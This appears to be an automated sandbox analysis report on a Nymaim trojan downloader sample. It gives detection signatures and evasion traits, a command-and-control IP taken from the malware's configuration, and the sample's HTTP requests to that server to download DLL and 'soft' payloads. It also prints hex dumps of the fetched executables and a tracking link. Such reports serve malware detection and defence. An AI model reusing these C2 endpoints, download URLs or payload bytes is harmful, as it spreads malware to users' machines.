Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565534
MD5: 9d2eed099096486e2ae388b2b220497c
SHA1: c84457bca7db83641fd56925c6496b4c9a8c6c5b
SHA256: 5d5a9d7c44e0dbd125b577319dcad5274121c38b6cde03658eb83c49e316d307
Tags: exeuser-Bitsight
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Nymaim Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

AV Detection
barindex
Found malware configuration
Source: 1.2.file.exe.400000.0.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe ReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 1_2_004035D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04933837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 1_2_04933837
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00417727 FindFirstFileExW, 1_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10007EA9 FindFirstFileExW, 1_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0494798E FindFirstFileExW, 1_2_0494798E

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 04:35:53 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 04:35:54 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.156.72.65 185.156.72.65
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 1_2_00401970
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/download
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/key
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/download
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/soft/download
Source: Amcache.hve.14.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: https://iplogger.org/1Pz8p7

E-Banking Fraud
barindex
Yara detected Nymaim
Source: Yara match File source: 1.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00403D40 1_2_00403D40
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402EE0 1_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00404F70 1_2_00404F70
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00410940 1_2_00410940
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041A346 1_2_0041A346
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040EBC7 1_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00415E59 1_2_00415E59
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040B6D0 1_2_0040B6D0
